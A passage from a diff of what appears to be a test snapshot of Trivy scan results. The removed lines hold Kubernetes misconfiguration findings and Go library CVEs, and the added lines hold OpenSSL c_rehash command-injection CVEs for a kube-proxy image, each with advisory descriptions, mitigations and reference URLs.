"https://avd.aquasec.com/misconfig/ksv011", + "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf", }, { "type": "URL", - "value": "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3711", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Deployment/local-path-provisioner' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV012", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", - "https://avd.aquasec.com/misconfig/ksv012", - ], - }, - "category": "Misconfiguration", - "description": "'runAsNonRoot' forces the running image to run as a non-root user to ensure least privileges.", - "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", - "mitigation": "Set 'containers[].securityContext.runAsNonRoot' to true.", - "name": "Runs as root user(Container 'local-path-provisioner' of Deployment 'local-path-provisioner' should set 'securityContext.runAsNonRoot' to true)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv012", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=59f5e75f3bced8fc0e130d72a3f582cf7b480b46", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "value": "https://github.com/advisories/GHSA-5ww6-px42-wc85", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Deployment/local-path-provisioner' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV014", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-securitycontext-readonlyrootfilesystem-true/", - "https://avd.aquasec.com/misconfig/ksv014", - ], - }, - "category": "Misconfiguration", - "description": "An immutable root file system prevents applications from writing to their local disk. This can limit intrusions, as attackers will not be able to tamper with the file system or write foreign executables to disk.", - "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", - "mitigation": "Change 'containers[].securityContext.readOnlyRootFilesystem' to 'true'.", - "name": "Root file system is not read-only(Container 'local-path-provisioner' of Deployment 'local-path-provisioner' should set 'securityContext.readOnlyRootFilesystem' to true)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv014", + "value": "https://lists.apache.org/thread.html/r18995de860f0e63635f3008fd2a6aca82394249476d21691e7c59c9e@%3Cdev.tomcat.apache.org%3E", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-securitycontext-readonlyrootfilesystem-true/", + "value": "https://lists.apache.org/thread.html/rad5d9f83f0d11fb3f8bb148d179b8a9ad7c6a17f18d70e5805a713d1@%3Cdev.tomcat.apache.org%3E", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Deployment/local-path-provisioner' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV015", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", - "https://avd.aquasec.com/misconfig/ksv015", - ], - }, - "category": "Misconfiguration", - "description": "When containers have resource requests specified, the scheduler can make better decisions about which nodes to place pods on, and how to deal with resource contention.", - "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", - "mitigation": "Set 'containers[].resources.requests.cpu'.", - "name": "CPU requests not specified(Container 'local-path-provisioner' of Deployment 'local-path-provisioner' should set 'resources.requests.cpu')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv015", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-3711", }, { "type": "URL", - "value": "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", + "value": "https://rustsec.org/advisories/RUSTSEC-2021-0097.html", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Deployment/local-path-provisioner' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV016", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-resources-limits-memory/", - "https://avd.aquasec.com/misconfig/ksv016", - ], - }, - "category": "Misconfiguration", - "description": "When containers have memory requests specified, the scheduler can make better decisions about which nodes to place pods on, and how to deal with resource contention.", - "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", - "mitigation": "Set 'containers[].resources.requests.memory'.", - "name": "Memory requests not specified(Container 'local-path-provisioner' of Deployment 'local-path-provisioner' should set 'resources.requests.memory')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv016", + "value": "https://security.gentoo.org/glsa/202209-02", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-resources-limits-memory/", + "value": "https://security.gentoo.org/glsa/202210-02", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Deployment/local-path-provisioner' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV018", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-resources-limits-memory/", - "https://avd.aquasec.com/misconfig/ksv018", - ], - }, - "category": "Misconfiguration", - "description": "Enforcing memory limits prevents DoS via resource exhaustion.", - "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", - "mitigation": "Set a limit value under 'containers[].resources.limits.memory'.", - "name": "Memory not limited(Container 'local-path-provisioner' of Deployment 'local-path-provisioner' should set 'resources.limits.memory')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv018", + "value": "https://security.netapp.com/advisory/ntap-20210827-0010/", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-resources-limits-memory/", + "value": "https://security.netapp.com/advisory/ntap-20211022-0003/", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Deployment/local-path-provisioner' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV020", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-securitycontext-runasuser/", - "https://avd.aquasec.com/misconfig/ksv020", - ], - }, - "category": "Misconfiguration", - "description": "Force the container to run with user ID > 10000 to avoid conflicts with the host’s user table.", - "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", - "mitigation": "Set 'containers[].securityContext.runAsUser' to an integer > 10000.", - "name": "Runs with low user ID(Container 'local-path-provisioner' of Deployment 'local-path-provisioner' should set 'securityContext.runAsUser' > 10000)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv020", + "value": "https://ubuntu.com/security/notices/USN-5051-1", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-3711", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Deployment/local-path-provisioner' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV021", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-securitycontext-runasuser/", - "https://avd.aquasec.com/misconfig/ksv021", - ], - }, - "category": "Misconfiguration", - "description": "Force the container to run with group ID > 10000 to avoid conflicts with the host’s user table.", - "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", - "mitigation": "Set 'containers[].securityContext.runAsGroup' to an integer > 10000.", - "name": "Runs with low group ID(Container 'local-path-provisioner' of Deployment 'local-path-provisioner' should set 'securityContext.runAsGroup' > 10000)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv021", + "value": "https://www.debian.org/security/2021/dsa-4963", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", - }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Deployment/local-path-provisioner' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV030", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", - "https://avd.aquasec.com/misconfig/ksv030", - ], - }, - "category": "Misconfiguration", - "description": "The RuntimeDefault/Localhost seccomp profile must be required, or allow specific additional profiles.", - "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", - "mitigation": "Set 'spec.securityContext.seccompProfile.type', 'spec.containers[*].securityContext.seccompProfile' and 'spec.initContainers[*].securityContext.seccompProfile' to 'RuntimeDefault' or undefined.", - "name": "Default Seccomp profile not set(Either Pod or Container should set 'securityContext.seccompProfile.type' to 'RuntimeDefault')", - "references": [ + "value": "https://www.openssl.org/news/secadv/20210824.txt", + }, { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv030", + "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "value": "https://www.oracle.com/security-alerts/cpujan2022.html", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Deployment/local-path-provisioner' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV106", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", - "https://avd.aquasec.com/misconfig/ksv106", - ], - }, - "category": "Misconfiguration", - "description": "Containers must drop ALL capabilities, and are only permitted to add back the NET_BIND_SERVICE capability.", - "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", - "mitigation": "Set 'spec.containers[*].securityContext.capabilities.drop' to 'ALL' and only add 'NET_BIND_SERVICE' to 'spec.containers[*].securityContext.capabilities.add'.", - "name": "Container capabilities must only include NET_BIND_SERVICE(container should drop all)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv106", + "value": "https://www.oracle.com/security-alerts/cpuoct2021.html", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "value": "https://www.tenable.com/security/tns-2021-16", + }, + { + "type": "URL", + "value": "https://www.tenable.com/security/tns-2022-02", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": "2.16.0+incompatible", - "foundIn": "Target: 'metrics-sidecar' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-1996", - "installedVersion": "v2.15.0+incompatible", - "packageName": "github.com/emicklei/go-restful", + "fixedVersion": "1.1.1n-0+deb10u2", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-1292", + "installedVersion": "1.1.1d-0+deb10u6", + "packageName": "libssl1.1", "references": [ - "https://access.redhat.com/security/cve/CVE-2022-1996", - "https://github.com/advisories/GHSA-r48q-9g5r-8q2h", - "https://github.com/emicklei/go-restful/commit/926662532deb450272956c7bc573978464aae74e", - "https://github.com/emicklei/go-restful/commit/f292efff46ae17e9d104f865a60a39a2ae9402f1", - "https://github.com/emicklei/go-restful/commit/fd3c327a379ce08c68ef18765bdc925f5d9bad10", - "https://github.com/emicklei/go-restful/issues/489", - "https://huntr.dev/bounties/be837427-415c-4d8c-808b-62ce20aa84f1", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/575BLJ3Y2EQBRNTFR2OSQQ6L2W6UCST3/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OBDD3Q23RCGAGHIXUCWBU6N3S4RNAKXB/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RQXU752ALW53OJAF5MG3WMR5CCZVLWW6/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SO5QC2JFW2PXBWAE27OYYYL5SPFUBHTY/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/W56PP46JVZEKCANBKXFKRVSBBRRMCY6V/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z55VUVGO7E5PJFXIOVAY373NZRHBNCI5/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZGQKWD6SE75PFBPFVSZYAKAVXKBZXKWS/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-1996", - "https://pkg.go.dev/vuln/GO-2022-0619", - "https://security.netapp.com/advisory/ntap-20220923-0005/", - "https://www.cve.org/CVERecord?id=CVE-2022-1996", + "https://access.redhat.com/errata/RHSA-2022:6224", + "https://access.redhat.com/security/cve/CVE-2022-1292", + "https://bugzilla.redhat.com/2081494", + "https://bugzilla.redhat.com/2087911", + "https://bugzilla.redhat.com/2087913", + "https://bugzilla.redhat.com/2097310", + "https://bugzilla.redhat.com/2104905", + "https://bugzilla.redhat.com/show_bug.cgi?id=2081494", + "https://bugzilla.redhat.com/show_bug.cgi?id=2097310", + "https://bugzilla.redhat.com/show_bug.cgi?id=2100554", + "https://bugzilla.redhat.com/show_bug.cgi?id=2104905", + "https://cert-portal.siemens.com/productcert/pdf/ssa-953464.pdf", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1292", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2068", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2097", + "https://errata.almalinux.org/9/ALSA-2022-6224.html", + "https://errata.rockylinux.org/RLSA-2022:5818", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=1ad73b4d27bd8c1b369a3cd453681d3a4f1bb9b2", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=548d3f280a6e737673f5b61fce24bb100108dfeb", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=e5fd1728ef4c7a5bf7c7a7163ca60370460a6e23", + "https://linux.oracle.com/cve/CVE-2022-1292.html", + "https://linux.oracle.com/errata/ELSA-2022-9751.html", + "https://lists.debian.org/debian-lts-announce/2022/05/msg00019.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VX4KWHPMKYJL6ZLW4M5IU7E5UV5ZWJQU/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZNU5M7BXMML26G3GPYKFGQYPQDRSNKDD/", + "https://mta.openssl.org/pipermail/openssl-announce/2022-May/000224.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-1292", + "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2022-0011", + "https://security.gentoo.org/glsa/202210-02", + "https://security.netapp.com/advisory/ntap-20220602-0009/", + "https://security.netapp.com/advisory/ntap-20220729-0004/", + "https://ubuntu.com/security/notices/USN-5402-1", + "https://ubuntu.com/security/notices/USN-5402-2", + "https://www.cve.org/CVERecord?id=CVE-2022-1292", + "https://www.debian.org/security/2022/dsa-5139", + "https://www.openssl.org/news/secadv/20220503.txt", + "https://www.oracle.com/security-alerts/cpujul2022.html", ], }, "category": "Vulnerability", - "description": "Authorization Bypass Through User-Controlled Key in GitHub repository emicklei/go-restful prior to v3.8.0.", - "location": "scb://trivy/?Namespace=kubernetes-dashboard&Kind=Deployment&Name=dashboard-metrics-scraper", + "description": "The c_rehash script does not properly sanitise shell metacharacters to prevent command injection. This script is distributed by some operating systems in a manner where it is automatically executed. On such operating systems, an attacker could execute arbitrary commands with the privileges of the script. Use of the c_rehash script is considered obsolete and should be replaced by the OpenSSL rehash command line tool. Fixed in OpenSSL 3.0.3 (Affected 3.0.0,3.0.1,3.0.2). Fixed in OpenSSL 1.1.1o (Affected 1.1.1-1.1.1n). Fixed in OpenSSL 1.0.2ze (Affected 1.0.2-1.0.2zd).", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "Authorization Bypass Through User-Controlled Key", + "name": "c_rehash script allows command injection", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-1996", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-1996", - }, - { - "type": "URL", - "value": "https://github.com/advisories/GHSA-r48q-9g5r-8q2h", + "value": "https://avd.aquasec.com/nvd/cve-2022-1292", }, { "type": "URL", - "value": "https://github.com/emicklei/go-restful/commit/926662532deb450272956c7bc573978464aae74e", + "value": "https://access.redhat.com/errata/RHSA-2022:6224", }, { "type": "URL", - "value": "https://github.com/emicklei/go-restful/commit/f292efff46ae17e9d104f865a60a39a2ae9402f1", + "value": "https://access.redhat.com/security/cve/CVE-2022-1292", }, { "type": "URL", - "value": "https://github.com/emicklei/go-restful/commit/fd3c327a379ce08c68ef18765bdc925f5d9bad10", + "value": "https://bugzilla.redhat.com/2081494", }, { "type": "URL", - "value": "https://github.com/emicklei/go-restful/issues/489", + "value": "https://bugzilla.redhat.com/2087911", }, { "type": "URL", - "value": "https://huntr.dev/bounties/be837427-415c-4d8c-808b-62ce20aa84f1", + "value": "https://bugzilla.redhat.com/2087913", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/575BLJ3Y2EQBRNTFR2OSQQ6L2W6UCST3/", + "value": "https://bugzilla.redhat.com/2097310", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OBDD3Q23RCGAGHIXUCWBU6N3S4RNAKXB/", + "value": "https://bugzilla.redhat.com/2104905", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RQXU752ALW53OJAF5MG3WMR5CCZVLWW6/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2081494", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SO5QC2JFW2PXBWAE27OYYYL5SPFUBHTY/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2097310", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/W56PP46JVZEKCANBKXFKRVSBBRRMCY6V/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2100554", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z55VUVGO7E5PJFXIOVAY373NZRHBNCI5/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2104905", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZGQKWD6SE75PFBPFVSZYAKAVXKBZXKWS/", + "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-953464.pdf", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1292", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-1996", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2068", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2022-0619", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2097", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220923-0005/", + "value": "https://errata.almalinux.org/9/ALSA-2022-6224.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-1996", + "value": "https://errata.rockylinux.org/RLSA-2022:5818", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": "0.0.0-20220906165146-f3363e06e74c", - "foundIn": "Target: 'metrics-sidecar' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-27664", - "installedVersion": "v0.0.0-20220524220425-1d687d428aca", - "packageName": "golang.org/x/net", - "references": [ - "https://access.redhat.com/errata/RHSA-2023:2357", - "https://access.redhat.com/security/cve/CVE-2022-27664", - "https://bugzilla.redhat.com/2107371", - "https://bugzilla.redhat.com/2107374", - "https://bugzilla.redhat.com/2107383", - "https://bugzilla.redhat.com/2107386", - "https://bugzilla.redhat.com/2107388", - "https://bugzilla.redhat.com/2113814", - "https://bugzilla.redhat.com/2124669", - "https://bugzilla.redhat.com/2132868", - "https://bugzilla.redhat.com/2132872", - "https://bugzilla.redhat.com/2161274", - "https://bugzilla.redhat.com/show_bug.cgi?id=1913333", - "https://bugzilla.redhat.com/show_bug.cgi?id=1913338", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107371", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107374", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107383", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107386", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107388", - "https://bugzilla.redhat.com/show_bug.cgi?id=2113814", - "https://bugzilla.redhat.com/show_bug.cgi?id=2124669", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28851", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28852", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1705", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27664", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30630", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30632", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30635", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32148", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32189", - "https://errata.almalinux.org/9/ALSA-2023-2357.html", - "https://errata.rockylinux.org/RLSA-2022:7129", - "https://github.com/advisories/GHSA-69cg-p879-7622", - "https://github.com/golang/go/commit/5bc9106458fc07851ac324a4157132a91b1f3479 (go1.18.6)", - "https://github.com/golang/go/commit/9cfe4e258b1c9d4a04a42539c21c7bdb2e227824 (go1.19.1)", - "https://github.com/golang/go/issues/54658", - "https://go.dev/cl/428735", - "https://go.dev/issue/54658", - "https://groups.google.com/g/golang-announce", - "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s", - "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s/m/0tgO0pjiBQAJ", - "https://linux.oracle.com/cve/CVE-2022-27664.html", - "https://linux.oracle.com/errata/ELSA-2023-2802.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXKTHIGE5F576MAPFYCIJXNRGBSPISUF/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TXS2OQ57KZC5XZKK5UW4SYKPVQAHIOJX/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-27664", - "https://pkg.go.dev/vuln/GO-2022-0969", - "https://security.gentoo.org/glsa/202209-26", - "https://security.netapp.com/advisory/ntap-20220923-0004/", - "https://ubuntu.com/security/notices/USN-6038-1", - "https://www.cve.org/CVERecord?id=CVE-2022-27664", - ], - }, - "category": "Vulnerability", - "description": "In net/http in Go before 1.18.6 and 1.19.x before 1.19.1, attackers can cause a denial of service because an HTTP/2 connection can hang during closing if shutdown were preempted by a fatal error.", - "location": "scb://trivy/?Namespace=kubernetes-dashboard&Kind=Deployment&Name=dashboard-metrics-scraper", - "mitigation": undefined, - "name": "handle server errors after sending GOAWAY", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-27664", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=1ad73b4d27bd8c1b369a3cd453681d3a4f1bb9b2", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2023:2357", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=548d3f280a6e737673f5b61fce24bb100108dfeb", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-27664", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=e5fd1728ef4c7a5bf7c7a7163ca60370460a6e23", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2107371", + "value": "https://linux.oracle.com/cve/CVE-2022-1292.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2107374", + "value": "https://linux.oracle.com/errata/ELSA-2022-9751.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2107383", + "value": "https://lists.debian.org/debian-lts-announce/2022/05/msg00019.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2107386", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VX4KWHPMKYJL6ZLW4M5IU7E5UV5ZWJQU/", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2107388", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZNU5M7BXMML26G3GPYKFGQYPQDRSNKDD/", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2113814", + "value": "https://mta.openssl.org/pipermail/openssl-announce/2022-May/000224.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2124669", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-1292", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2132868", + "value": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2022-0011", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2132872", + "value": "https://security.gentoo.org/glsa/202210-02", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2161274", + "value": "https://security.netapp.com/advisory/ntap-20220602-0009/", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1913333", + "value": "https://security.netapp.com/advisory/ntap-20220729-0004/", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1913338", + "value": "https://ubuntu.com/security/notices/USN-5402-1", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107371", + "value": "https://ubuntu.com/security/notices/USN-5402-2", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107374", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-1292", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107383", + "value": "https://www.debian.org/security/2022/dsa-5139", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107386", + "value": "https://www.openssl.org/news/secadv/20220503.txt", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107388", + "value": "https://www.oracle.com/security-alerts/cpujul2022.html", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": "1.1.1n-0+deb10u3", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-2068", + "installedVersion": "1.1.1d-0+deb10u6", + "packageName": "libssl1.1", + "references": [ + "https://access.redhat.com/errata/RHSA-2022:6224", + "https://access.redhat.com/security/cve/CVE-2022-2068", + "https://bugzilla.redhat.com/2081494", + "https://bugzilla.redhat.com/2087911", + "https://bugzilla.redhat.com/2087913", + "https://bugzilla.redhat.com/2097310", + "https://bugzilla.redhat.com/2104905", + "https://bugzilla.redhat.com/show_bug.cgi?id=2081494", + "https://bugzilla.redhat.com/show_bug.cgi?id=2097310", + "https://bugzilla.redhat.com/show_bug.cgi?id=2100554", + "https://bugzilla.redhat.com/show_bug.cgi?id=2104905", + "https://cert-portal.siemens.com/productcert/pdf/ssa-332410.pdf", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1292", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2068", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2097", + "https://errata.almalinux.org/9/ALSA-2022-6224.html", + "https://errata.rockylinux.org/RLSA-2022:5818", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2c9c35870601b4a44d86ddbf512b38df38285cfa", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=7a9c027159fe9e1bbc2cd38a8a2914bff0d5abd9", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9639817dac8bbbaa64d09efad7464ccc405527c7", + "https://linux.oracle.com/cve/CVE-2022-2068.html", + "https://linux.oracle.com/errata/ELSA-2022-9751.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6WZZBKUHQFGSKGNXXKICSRPL7AMVW5M5/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VCMNWKERPBKOEBNL7CLTTX3ZZCZLH7XA/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-2068", + "https://security.netapp.com/advisory/ntap-20220707-0008/", + "https://ubuntu.com/security/notices/USN-5488-1", + "https://ubuntu.com/security/notices/USN-5488-2", + "https://www.cve.org/CVERecord?id=CVE-2022-2068", + "https://www.debian.org/security/2022/dsa-5169", + "https://www.openssl.org/news/secadv/20220621.txt", + ], + }, + "category": "Vulnerability", + "description": "In addition to the c_rehash shell command injection identified in CVE-2022-1292, further circumstances where the c_rehash script does not properly sanitise shell metacharacters to prevent command injection were found by code review. When the CVE-2022-1292 was fixed it was not discovered that there are other places in the script where the file names of certificates being hashed were possibly passed to a command executed through the shell. This script is distributed by some operating systems in a manner where it 